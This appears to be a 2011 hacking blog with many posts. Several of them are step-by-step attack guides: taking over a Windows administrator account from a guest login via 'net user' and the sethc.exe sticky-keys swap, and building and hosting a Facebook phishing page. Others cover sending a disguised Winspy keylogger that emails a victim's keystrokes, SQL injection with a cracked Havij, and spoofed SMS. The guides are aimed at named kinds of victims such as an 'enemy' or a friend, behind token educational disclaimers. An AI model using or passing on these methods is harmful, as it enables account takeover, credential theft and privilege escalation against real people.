Blogger Widgets

About Ash Hacker

My photo
I am a social-techno-learner which believes in its own efficiency first and then implements with the suggestions of my strong and enthusiastic Team which helps me takes everything into its perfection level.

Saturday 17 December 2011

Hack administrator account



Administrator password can be changed easily without knowing its password. Thing needed is just access to that computer you want to hack from any user account


follow some easy steps....

1. open start<run and type cmd
     
2. in command prompt write net user......... it will give u details about the users of that system. you will find administrator name here.



here 2 shows the administrator username...... and you can see here i m login from the guest account.....


3. write again on command prompt net user [Administrator's Username] *
now  it will ask for new password without asking the current one....


Note:

  • you have to write Administrator's Username without using  brackets [ and 
  • Also here is space between  Administrator's Username and *





4. now just type the password and press enter(Remember the password will not be visible due to security purpose)..... now press enter...then it will ask for retype password.... and again type the new password and press enter....... now cheers..... u hacked the system☺




Note: If it not work from guest account then boot through safe mode and login by simply write Administrator in username and leave blank the password field.
then follow the steps mentioned above.
.....Ash-Hacker.

Trick to hack administrator Account using Guest account in XP- 100% works



Hello Friends,


As Some people want to knoe  to hack administrator account through cmd.


So Today, i m telling a new way that will work 100%.




Follow these steps:


1. ok, First of all login through your guest account and open C:\WINDOWS\system32


2. Now look for cmd.exe and sethc.exe


3. copy these both exe files and place it any safe location


4. Now again go to C:\WINDOWS\system32, now rename cmd.exe into sethc.exe...... As sethc.exe is already exist, so a window will open... says..would you want to replace..... press yes...






5. Now Restart your system.


6. When login screen come.... press Shift key for 5 times.... then command prompt will open.


7. Now you can hack an administrator account in 2 way:
  • By hacking recent administrator's account by changing its password.
  • By giving Administrator's privileges to your guest account 

      So decide what you want to do....

8. Now

      8.1    if  you choose 1st one i.e. "Hacking recent administrator's account by changing its password".>>> then go to my post Hack administrator account and follow step 3 & 4 there.

      8.2     Or if you choose 2nd one then write in command prompt:
                   net localgroup administrators your_guest_account_name /add


9. Done!!!!! :)




.....Ash-hacker.
Tested on: Windows XP

Friday 16 December 2011

Trick to change login screen background of facebook (only for chrome)



If you are tired of the same old login screen on Facebook and you want to customize it just like the desktop of your computer then you must try this extension for Google Chrome that lets you change the background image at the login to facebook.com

Once you've installed the extension ( from here ), go to the list of extensions (the wrench at the top right, tools, extensions), try FB Login Screen Changer and click on "options". You can enter the URL of the background choice and set whether to repeat horizontally or vertically.

At this point, after logging out of Facebook, visiting the site you should display your background image.

Learn How To Make Bootable Pendrive For Windows 7 Using Only Command Prompt



I got the basic commands from the net and am going to take you step by step through the process without having to use a 3rd party program using the command prompt to utilize DiskPart which is built into Windows 7 by default. So here I give a brief and 100% tested tutorial on how to create a Windows 7 Bootable USB Pendrive to install Windows 7 from USB Pendrive.

Also we can bootable pendrive on windows 7,vista,xp using software visit this Link

How to make bootable pendrive using command prompt how that works follow this steps.

1)  Open a command prompt as administrator (Right click on Start > All Programs > Accessories > Command Prompt and select “Run as administrator”.

2) Then run diskpart utility from command prompt, by typing ‘diskpart’ on command prompt and pressing enter. This will run the diskpart utility in a separate windows, which is shown in 2nd picture below:
 3) Now type in cmd  "list disk" and hit enter The number of your USB drive will listed. You’ll need this for the next step.Then you have to type ‘select disk 2′ and press enter. Note: in our case it is disk 2, in your case it may be disk 3, or disk 1 or any other number.
 4)Now you enter ‘detail disk’ to see the details of the disk after selecting it to verify that you have selected the correct disk. You can see these steps in the image below:
 5) Then you have perform this command in cmd. The commands can run by order:
- clean
- create partition primary
- select partition 1
- active
- format fs=fat32  (Command "Format fs=ntfs quick" will speed up the format otherwise it takes hell lot of time to format big pendrives.)
 6) These steps are shown in the image below:
After the format is complete you have to run ‘assign’ command. And after this you can exit diskpart utility by entering the ‘exit’ command. The steps are shown below:
- assign
- exit.
7) After the format process is complete, put in your  Windows 7 DVD in your DVD drive, or if you have using any  .iso image of the DVD, mount that image using any virtual drive software like Power ISO.
Download UltraISO Software

- Now go to My Computer, & open the virtual or original of DVD Drive. Press ‘ctrl+a’ to select all contents
and copy all the contents by pressing ‘ctrl+c’.

-Aafter complete all process. open the USB Drive and press ‘ctrl+v’ to paste all the contents of DVD into the USB Disk.
.....Ash-Hacker.

How to Send Fake Sms using Any number to Any number in India Without Registration!!



It’s hard to believe but it’s true. Can you imagine you can send free anonymous sms from fake or from any number to any number. As the trick I wrote now is among very few ways to send anonymous sms online that really works at the time I am give tutorial.


-Not login required.

-Not registration process required.

-Direct Send SMS to vitim.

-Send Unlimited SMS

-visit this link Fake Sms

-Enjoy this trick to send fake Sms using any mobile number.

-no advertisement.
.....Ash-Hacker.

Thursday 15 December 2011

How to get into facebook at school

Most of people complain me that they cannot get into facebook at school,offices etc or the acess to blocked to facebook.com.In this post i to show you how to get into facebook at school or offices and unblock facebook.In this article i will show you possible method to unblock facebook and get into facebook at school




get into facebook at school




How to get into facebook at school - Method


1. Go to Unblock facebook now Now site.

2. You will see something like this :


Unblock facebook


3. Now, simply enter www.facebook.com in text field below “Website URL” and hit “Browse” to unblock Facebook site.

4. Thus, now your blocked Facebook is converted to unblocked Facebook and you can now get into facebook at school or office using this hack

Thats it. Just check out this Facebook proxy site server useful to unblock Facebook site. Thus, you can now bypass Facebook restrictions imposed by sytem admins and unblock Facebook site. This proxy site can not only unblock Facebook, but also unblock myspace, orkut and many other blocked sites. If you have any problem in using this Facebook proxy site to unblock Facebook,

how to view private facebook profiles

Learn how to view private facebook profiles
In post i will tell you how to view private facebook profiles,This latest hack proves that anyone in the world is able to view anyone’s private tagged pictures,This is why facebook is not privite is still open even after such publicity all over the web.Major security threat.
Have you ever wanted to see pictures of an enemy but you couldn’t because her or his facebook account was set to private. Well thats all going to change because I will show you very simple way to view private facebook profiles


Method:

1. Login in your Facebook Account
www.facebook.com

2. Search for the person

3. Find the persons ID # by Clicking on Send messages

Facebook photo hack


5. Copy and Replace the ID # to the link


http://www.facebook.com/photo.php?pid=1234567&id=[Person’s ID]&op=1&view=all&subj=[Person’s ID]

6. Copy and paste the link in your browser

7. You should be able to see 10-20 pictures before facebook denies you access.
.....Ash-Hacker.

Steps to take when your Facebook account gets Hacked:



It would be a Nightmare for anyone whose Facebook account gets Hacked,He would wonder How to get back his Hacked Facebook account,In this article i will tell you some methods through which you can Regain your Hacked Facebook account,


Steps to take when your Facebook account gets Hacked:
 

1.Reset Facebook Password with Secondary email address:
When ever you sign up for a Facebook account,they ask for your Secondary email address,In case if you loose your Password you can reset it with your Secondary email address.

2.Secret Answer:
Yes you can also reset a Facebook password with a Secret Answer which you provided to the Facebook while Signing up For a Facebook account


3.Contacting Facebook:
Lastly if Hacker has changed your Secondary Email address and Secret Question then you have only one way left i.e. Contacting Facebook team for the issue.

 Below i am also writting some ways to Protect your Facebook account from getting Hacked

Protect your Facebook account from getting Hacked:

1.Use Strong Passwords:
In order to keep your Facebook account From Getting Cracked with a Brute force,Dictionary or Rainbow tables you need to keep Strong password usually more than 10 letters or else it will be damn easy for the Hacker to Hack a Facbebook password

2.Use Phishing filter:
Phishing filter is a sheild which protects you from Fake login pages,These fake login pages are made to steal your passwords and Phishing filter will prevent you from logging into these kinds of pages



3.Use a good Antivirus and Antispyware:Yes,this is the most crucial step in all the above mentioned,It is highly recommended that you use a Good antivirus and antispyware program,I would recommend Kaspersky as an antivirus and as an spyware spyware cease and dont forget to update them regularly,Remember one trojan takes it all.


4.Use a Good antilogger:
Antilogger is a program which lets you know if a keylogger is present on your computer,Keylogger is a spyware program which helps you track of what is happening on your Computer.

 

5.Use a Good Firewall:
If you want to prevent a Hacker to enter in your Computer and Hack your Facebook password than you must use a good firewall,I  personally Recommend Zonealaram firewall.Firewall is a Hindrance in Hacking,A hacker may bypass antivirus but its very difficult for a Hacker to bypass a Firewall

Hope Methods will help you to prevent your Facebook account from getting hacked,It is higly recommended that you must follow all the above Methods to ensure maximum security.
.....Ash-Hacker.

How to hack facebook password




Are you curious to "hack facebook password" well then this post is just for you, Most people ask me to tell them the easiest way to hack facebook password, so here are some ways to that hackers take to hack facebook password:




1.Facebook phishing
2.Keylogging
3.Facebook new features
4.virus
See my article on 4 ways on how to hack a facebook password for information on the above methods
But today we will focus on a method which has a high success rate celled Phishing and keylogging,so first of all:


What is phishing?

Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. However phishing requires specialized knowledge and high level skills to implement. So I recommend the use of Phishing to hack facebook account since it is the easiest one.

Phishing Procedure:

First of all download Facebook fake login page
(Complete the survey to unlock Facebook fake login page)


1.once you have downloded facebook fake login page now extract contents in a folder

2.Now open pass.php and find (CTRL+F) 'http://rafayhackingarticles.blogspot.com' then change it to your to is the 'http://www.google.com.pk'

Note:'http://www.google.com' is the redirection url,When victim will enter his/her email and password he will redirected to'http://www.google.com' instead of "http://rafayhackingarticles.blogspot.com"

Now Save it .

3.Now open facebook fake page in a wordpad

4.Now in the fake page press Ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php

Hack facebook

5.Create an id in www.110mb.com,www.ripway.com or t35.com.

Note:Lots of people have complaint that they get banned from 110mb.com.ripway.com and t35.com so as an alternative you can use ooowebhost.

6.Then upload all the files Facebook.htm,Pass.php in 110mb directory or an other and just test it by going to http://yoursite.110mb.com/Facebook.htm for the fake login page.Just type some info into the text box and then you will see in your file manager that a file called "Facebook.txt" is created, In which the password is stored

7.Go to http://yoursite.110mb.com/Facebookpassword.htm for the stored passwords !

How it works?

When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it .So when the person clicks on try again it redirects to the actual URL so that the victim does not know that yoursite is a fake site and gets his Facebook.com password hacked

Keylogging - Easy way:


The easiest way and best way to hack Facebook is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers,below i will show you on How to hack facebook passwords with winspy and sniperspy

1. Sniper Spy (Remote Install Supported)



Remote password hacking softwareSniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands.


2.Winspy Keylogger

First of all free download Winspy keylogger software from link given below:

Download Winspy Keylogger

2. After downloading winspy keylogger to hack Facebook account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.

3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
Winspy keylogger to hack gmail account password

4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.



Winspy keylogger to hack gmail passwsord

5. Now, Winspy’s main screen will be displayed as shown in image below:




6. Select Remote at top, then Remote install.

7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.


hack gmail password


.user - type in the victim’s name
.file name - Name the file to be sent. Use the name such that victim will love to accept it.
.file icon - keep it the same
.picture - select the picture you want to apply to the keylogger.
In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id
Thats it. This much is enough. If you want, can change other settings also.

8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Facebook account password.
.....http://yeild2me.com/.

Wednesday 14 December 2011

What is Port scanning?



The point of port scanning a server is to detect its open ports the port’s listening services. Once a hacker knows all the services running on your server, he could search for possible vulnerabilities they may have and exploit them to take control of your website. In the port scanning example we will use the most popular port scanner: Nmap. The Nmap Security Scanner is available for both Mac and Windows users: http://nmap.org/download.html . The example will be shown using the Nmap GUI (Graphical User Interface). Otherwise known as Zenmap.

1. First the hacker would choose a target and place it in the target box. As you can see the “Command:” section gets updated as well. This is what the command would look like if you were running the CLI version.


2. Next the hacker would choose the “Profile:”, or in other words, the scan type. A smart hacker would go with a quick and quiet scan. Full version detection scans are very loud and could raise suspicion on the other end. Stay away from those options because as you will see later on, there are other ways to get that information.


3. A sample scan result may look like the following:


4. As you can see it found a few open ports and listed the services that are run on them. Below I have a list of some of the most popular ports/services on the internet.


20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH (Secure Shell)
23 Telnet 25 SMTP (Send Mail Transfer Protocol)
43 whois
53 DNS (Domain Name Service)
68 DHCP (Dynamic Host Control Protocol)
80 HTTP (HyperText Transfer Protocol)
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
1352 Lotus Notes
1433 Microsoft SQL Server
1521 Oracle SQL
2049 NFS (Network File System)
3306 MYSQL
4000 ICQ
5800 VNC
5900 VNC
8080 HTTP

5. Along with finding out what ports are running, the hacker needs to also find out what operating system the server is running. There are always a lot of operating system vulnerabilities out there to choose from. So by knowing the operating system, the hacker’s chances of taking over the server go up.

As you can see, there is an option on Nmap to detect the operating system, but this scan is very loud and easily detected so it is better to avoid it if possible. A simple way to determine what the server is running is by getting a 404 error page. You can get there by going to a page that doesn’t exist. For example the hacker would put in “www.targetsite.com/asdlfjasl.php” this page will most likely not exist and bring him to the 404 page. On most sites the 404 error page displays the server operating system along with its version. Many sites nowadays don’t display this by putting up custom 404 pages so this may not always work.

6. If you are planning on using the CLI version of Nmap, or want a more in depth look at all the commands take a look at the Nmap manual: http://nmap.org/book/man.html .

7. Now that the hacker has got all the running services and open ports on the targets system, he will now have to find out what versions the server is running. This is where “Banner Grabbing” comes in.

.....Ash-Hacker.

How to increase your internet speed



Increase internet speed

The following post is on will tell you some methods to increase your internet speed,I will show you some ways to increase your net and browser speed

Go to Start>>Run and then type in “gpedit.msc” without the quotes (“)

Computer Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler.
after that, you should see something like “Limit Reservable Bandwidth”. Modify that and set it to “Disabled”, or you can put it to “Enabled” and change the value to 0.

Now this will increase your internet speed by 20%
.....Ash-Hacker

How to hack facebook password ?



I will cover 4 methods over here:

1. Facebook Phishing
2. Keylogging
3. Social engineering
4. Primary email address hack

Facebook phishing:

I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here as i have added more on Phishing in my article How to hack facebook password

Keylogging:


This is my second favorite, as only thing you have to do is remotely install a keylogger application (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack facebook password. I have posted detailed information of top keyloggers in the trade for more information see my password hacking softwares section

3. Social engineering:

This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on Facebook and i got his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For newbies, social engineering is method of retrieving password or answer of security question simply be quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.


4.Primary email address hack


If Facebook hacker, by some means, hacks your gmail or yahoo account which you are using as primary email address, then this Facebook hacker can easily hack your Facebook password using "Forgot password" trick. He will simply ask Facebook to send password reset email to your primary email address- which is already hacked. Thus, your Facebook account password will be reset and it will be hacked !!!


So, always remember to protect your Facebook primary email address and try to keep unknown or useless mail id as your primary email address
So far, i found these Facebook hacking methods as best and working ways to hack facebook account passwords. I never encourage hacking Facebook or any email account,,I just wanna make you aware about Facebook dangers online. I will appreciate your effort if you mention any other Facebook hacking method.
.....Ash-Hacker.

Top 10 Ways How Hackers Can Hack Facebook Accounts In 2011



Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers, I have written a couple of post related to facebook hacking here at RHA, In my previous post which I wrote in 2010 related to facebook hacking and security 4 ways on How to hack facebook password, I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2011, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts in 2010.


10 Ways How Hackers Can Hack Facebook Accounts In 2011

So here are the top 10 methods which have been the most popular in 2011:


1. Facebook Phishing 




Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.

I have explained the step by step phishing process in my post below:

  • How To Hack Facebook Password

2. Keylogging 

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. I have dedicated a half of my newsest book "An introduction to keyloggers, RATS And Malware" to this topic.

Ethical Hacking Book
3. Stealers 



Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful. If you want to how stealers work and how you can set up your own one?, Kindly refer the book above.


4. Session Hijacking




Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking.

Further Information

  • Gmail Cookie Stealing And Session Hijacking Part 
  • Gmail Cookie Stealing And Session Hijacking Part 2
  • Gmail Cookie Stealing And Session Hijacking Part 
  • Facebook Session Hijacking Attack(Recommended)

5. Sidejacking With Firesheep


Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.

To know more about sidejacking attack and firesheep, read the post mentioned below:
  • Firesheep Makes Facebook Hacking Easy

6. Mobile Phone Hacking



Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.

The most popular Mobile Phone Spying softwares are:

1. Mobile Spy
2. Spy Phone Gold

7. DNS Spoofing 


If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.




8. USB Hacking 

Usb password stealer
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below:
  • Usb password stealer To Hack Facebook Passwords
9. Man In the Middle Attacks


If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article, We have written a couple of articles on man in the middle attacks which canb be accessed from the links mentioned below:
  • Man In the Middle Attacks With SSL Strip
If you are really interested in learning how man in the middle attacks, you can view the presentation below by oxid.it.

10. Botnets 


Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.


Facebook Hacking Course




Facebook hacking course is a facebook security course created by me, which tells you exactly how how hackers can compromise your facebook accounts and what can you do to protect your facebook accounts from getting hacked.

Click here to get access to the course

Hope you have enjoyed reading the post as much i did while writing.

Note: Copying or reproducing this article is strictly prohibited and will lead to certain consequences, If you are reproducing or copying this article, make sure that you give a proper credit.

SQL Injection Tutorial With Havij


Source-www.rafayhackingarticles.net

According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive information like (User Name ,Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now adays there are many tools available online through which any script kiddie can use SQL Injection to deface a website, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a builtin admin page finder which makes it very effective.

Download Havij 1.4 Pro Cracked here
Warning - This article is only for education purposes, By reading this article you agree that Ash-hacker is not responsible in any way for any kind of damage caused by the information provided in this article.
Supported Databases With Havij

  • MsSQL 2000/2005 with error.
  • MsSQL 2000/2005 no error union based
  • MySQL union based
  • MySQL Blind
  • MySQL error based
  • MySQL time based
  • Oracle union based
  • MsAccess union based
  • Sybase (ASE)

Demonstration

Now i will Show you step by step the process of SQL injection.

Step1: Find SQL injection Vulnerability in tour site and insert the string (like http://www.target.com/index.asp?id=123
) of it in Havij as show below.



Step2: Now click on the Analyse button as shown below.


Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:


Step3: Now click on the Tables button and then click Get Tables button from below column as shown below:

Step4: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.

Countermeasures:

Here are some of the countermeasures you can take to reduce the risk of SQL Injection

1.Renaming the admin page will make it difficult for a hacker to locate it

3. One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form, though this will make your passwords more vulnerable to bruteforce attacks but you can implement a captcha to prevent these types of attack.

Download SQL Strings here

How to Access Blocked Websites at Work, Office & School Using UltraSurf

Download UltraSurf


UltraSurf is a free software which enables users inside countries with heavy Internet censorship to visit any public web sites in the world safely and freely. Users in countries without internet censorship also use it to protect their internet privacy and security.

Installation:

It's a small, green software. No installation needed. You need to unzip the file if you download the zip version. Double-click the UltraSurf executable file to start UltraSurf program.

DOWNLOAD HERE
Settings:

All best settings has been shown above to use this software. Follow the same.

Unzip the downloaded file.
Click on .exe
Click on option at top
In new windows, click on proxy settings in the bottom
Click on Auto-Detect Proxy Option as shown above
Click OK and close all windows.
Reopen the software by clicking in the .exe
Wait for few seconds to connecting the server.
Once the ultrasurf connected to server, it will show- Successfully connected to server
The right side speed bar will auto generated after connected to server.
IE will open automatically. Close this IE.
Download GOOGLE CHROME INTERNET BROWSER. This is my recommendation because this
software is best compatible with google chrome.
PLS DNT TRY ULTRASURF WITH MOZILLA FIREFOX.



Once you successfully connected check the above settings in your IE. The Address will show 127.0.0.1 and port 9666. It means you are ready to open blocked websites.

Install Google chrome and open it. NOW OPEN ANY WEBSITE AND ENJOY.

If you face any problem using this software, just leave a comment here.
Email This BlogThis! Share to Twitter Share to Facebook
.....Ash-hacker.

Tuesday 13 December 2011

Send free SMS from Facebook

You heard it correct :)


You can send free sms from facebook by using an application its called the INDYAROCKS . I tested it and we can create the account by using facebook and few more things within 2 minutes. Start sending sms from the facebook application itself :) , you can send sms all over to india from the facebook itself :)
you can send free sms to your friends
* group sms
* schedule your sms and more features :)
* i heard that 160by2 and way2sms have limited sms sending facility, but indyarocks don’t have that limit we can send unlimited :) , By just login to your facebook account and open indyarocks application on facebook and start sending sms to your friends all over india
Email This BlogThis! Share to Twitter Share to Facebook Share to Google Buzz

Find who Unfreinded you on Facebook




Lots of people are curious to find who unfreind them or removed them on Facebook, If this is the case with you too then we have the solution for your curosity, Unfriend Finder for Facebook is a Google chorme extension which will let you know who Unfreinded you on Facebook , The Extension is very simple to use, Below I am posting a step by step guide to install and use Unfreind Finder

1.First of all Install Unfriend Finder for Facebook Google Chrome extension


2.Once it is installed you will get an “Unfriends” option just below “Friends” option.

Installation
Follow these Steps to Uninstall previous versions of Unfriend Finder.
From the Tool menu, you need to reach the Extension pages (or navigate to chrome://extensions/)


1)Confirm installation

2)Despite the alert about data collection, confirm.
Chrome shows this alert for every userscripts. Unfriend Finder is only collecting data about your friendlist, only on facebook.com.


3)Installation review


4) That's it. You are done with the installation. And now you will recieve the notification whenever you are unfriended.

For Installation Help for Mozilla Firefox & others, visit here

WEL-COME

You Are Welcome Heartly.......
Blogger Widgets